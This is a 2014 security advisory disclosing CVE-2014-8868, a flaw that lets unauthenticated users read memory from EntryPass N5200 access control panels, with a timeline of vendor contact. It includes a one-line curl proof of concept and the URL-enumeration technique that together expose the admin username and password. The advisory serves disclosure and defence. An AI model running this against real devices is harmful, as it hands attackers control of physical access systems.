187 lines
No EOL
6.2 KiB
Text
187 lines
No EOL
6.2 KiB
Text
Advisory: EntryPass N5200 Credentials Disclosure
|
|
|
|
EntryPass N5200 Active Network Control Panels allow the unauthenticated
|
|
downloading of information that includes the current administrative
|
|
username and password.
|
|
|
|
|
|
Details
|
|
=======
|
|
|
|
Product: EntryPass N5200 Active Network Control Panel
|
|
Affected Versions: unknown
|
|
Fixed Versions: not available
|
|
Vulnerability Type: Information Disclosure, Credentials Disclosure
|
|
Security Risk: high
|
|
Vendor URL: http://www.entrypass.net/w3v1/products/active-network/n5200
|
|
Vendor Status: notified
|
|
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-011
|
|
Advisory Status: published
|
|
CVE: CVE-2014-8868
|
|
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8868
|
|
|
|
|
|
Introduction
|
|
============
|
|
|
|
"EntryPass Active Networks are designed to enhance highly customized and
|
|
rapid 'real-time' changes to the underlying network operation.
|
|
Brilliantly engineered with all the power you need to enable
|
|
code-sending, minus unnecessary buffer time with its distributed
|
|
architecture capable of processing access demand at the edge level
|
|
without leveraging at the server end."
|
|
|
|
(From the vendor's home page)
|
|
|
|
|
|
More Details
|
|
============
|
|
|
|
EntryPass N5200 Active Network Control Panels offer an HTTP service on
|
|
TCP port 80. It appears that only the first character of a requested
|
|
URL's path is relevant to the web server. For example, requesting the
|
|
URL
|
|
|
|
http://example.com/1styles.css
|
|
|
|
yields the same CSS file as requesting the following URL:
|
|
|
|
http://example.com/1redteam
|
|
|
|
By enumerating all one-character long URLs on a device, it was
|
|
determined that URLs starting with a numeric character are used by the
|
|
web interface, as listed in the following table:
|
|
|
|
http://example.com/0 Index
|
|
http://example.com/1 Stylesheet
|
|
http://example.com/2 Authentication with Username/Password
|
|
http://example.com/3 Session Management
|
|
http://example.com/4 Device Status
|
|
http://example.com/5 Progressbar Image
|
|
http://example.com/6 Reset Status
|
|
http://example.com/7 Login Form
|
|
http://example.com/8 HTTP 404 Error Page
|
|
http://example.com/9 JavaScript
|
|
|
|
For URLs starting with non-numeric characters, an HTTP 404 - Not Found
|
|
error page is normally returned. Exceptions to this rule are URLs
|
|
starting with the lower case letters o to z and the upper case letters A
|
|
to D. When requesting these URLs, memory contents from the device appear
|
|
to be returned in the server's HTTP response.
|
|
|
|
As highlighted in the following listing, both the currently set username
|
|
ADMIN and the corresponding password 123456 are disclosed in the memory
|
|
contents when requesting the URL http://example.com/o:
|
|
|
|
$ curl -s http://example.com/o | hexdump -C | head
|
|
[...]
|
|
0010 XX XX XX XX XX XX XX XX XX XX XX 77 77 77 2e 65 |XXXXXXXXXXXwww.e|
|
|
0020 6e 74 72 79 70 61 73 73 2e 6e 65 74 00 00 00 00 |ntrypass.net....|
|
|
[...]
|
|
0060 XX XX XX XX XX XX XX XX XX XX 41 44 4d 49 4e 26 |XXXXXXXXXXADMIN&|
|
|
0070 20 20 31 32 33 34 35 36 26 20 XX XX XX XX XX XX | 123456& XXXXXX|
|
|
[...]
|
|
|
|
These credentials grant access to the administrative web interface of
|
|
the device when using them in the regular login form.
|
|
|
|
Similarly, it is possible to get the status output of the device without
|
|
prior authentication by simply requesting the following URL
|
|
|
|
http://example.com/4
|
|
|
|
The server responds to the request with the following XML data, which
|
|
contains information about various different settings of the device.
|
|
|
|
<html>
|
|
<head>
|
|
<title>Device Server Manager</title>
|
|
</head>
|
|
<body>
|
|
<serial_no>XXXXXXXXXXXX-XXXX</serial_no>
|
|
<firmware_version>HCB.CC.S1.04.04.11.02 -N5200[64Mb]</firmware_version>
|
|
<mac_address>XX-XX-XX-XX-XX-XX</mac_address>
|
|
<disable_reporting>disabled</disable_reporting>
|
|
<commit_setting>checked</commit_setting>
|
|
<user_id>ADMIN</user_id>
|
|
<user_pass>******</user_pass>
|
|
[...]
|
|
</body>
|
|
</html>
|
|
|
|
|
|
Proof of Concept
|
|
================
|
|
|
|
------------------------------------------------------------------------
|
|
$ curl -s http://example.com/o | hexdump -C | head
|
|
------------------------------------------------------------------------
|
|
|
|
|
|
Workaround
|
|
==========
|
|
|
|
Access to the web interface should be blocked at the network layer.
|
|
|
|
|
|
Fix
|
|
===
|
|
|
|
Not available.
|
|
|
|
|
|
Security Risk
|
|
=============
|
|
|
|
Attackers with network access to an EntryPass N5200 Active Network
|
|
Control Panel can retrieve memory contents from the device. These memory
|
|
contents disclose the currently set username and password needed to
|
|
access the administrative interface of the device. Using these
|
|
credentials, it is possible to read the device's current status and
|
|
configuration, as well as modify settings and install firmware updates.
|
|
|
|
With regards to the device itself, this vulnerability poses a high risk,
|
|
as it allows attackers to gain full control. The actual operational risk
|
|
depends on how the device is used in practice.
|
|
|
|
|
|
Timeline
|
|
========
|
|
|
|
2014-05-19 Vulnerability identified
|
|
2014-08-25 Customer approved disclosure to vendor
|
|
2014-08-27 Vendor contacted, security contact requested
|
|
2014-09-03 Vendor contacted, security contact requested
|
|
2014-09-15 Vendor contacted, vulnerability reported
|
|
2014-09-17 Update requested from vendor, no response
|
|
2014-10-15 No response from vendor. Customer discontinued use of the
|
|
product and approved public disclosure
|
|
2014-10-20 Contacted vendor again since no fix or roadmap was provided.
|
|
2014-10-28 CVE number requested
|
|
2014-11-14 CVE number assigned
|
|
2014-12-01 Advisory released
|
|
|
|
|
|
RedTeam Pentesting GmbH
|
|
=======================
|
|
|
|
RedTeam Pentesting offers individual penetration tests, short pentests,
|
|
performed by a team of specialised IT-security experts. Hereby, security
|
|
weaknesses in company networks or products are uncovered and can be
|
|
fixed immediately.
|
|
|
|
As there are only few experts in this field, RedTeam Pentesting wants to
|
|
share its knowledge and enhance the public knowledge with research in
|
|
security-related areas. The results are made available as public
|
|
security advisories.
|
|
|
|
More information about RedTeam Pentesting can be found at
|
|
https://www.redteam-pentesting.de.
|
|
|
|
|
|
--
|
|
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
|
|
Dennewartstr. 25-27 Fax : +49 241 510081-99
|
|
52068 Aachen https://www.redteam-pentesting.de
|
|
Germany Registergericht: Aachen HRB 14004
|
|
Geschäftsführer: Patrick Hof, Jens Liebchen |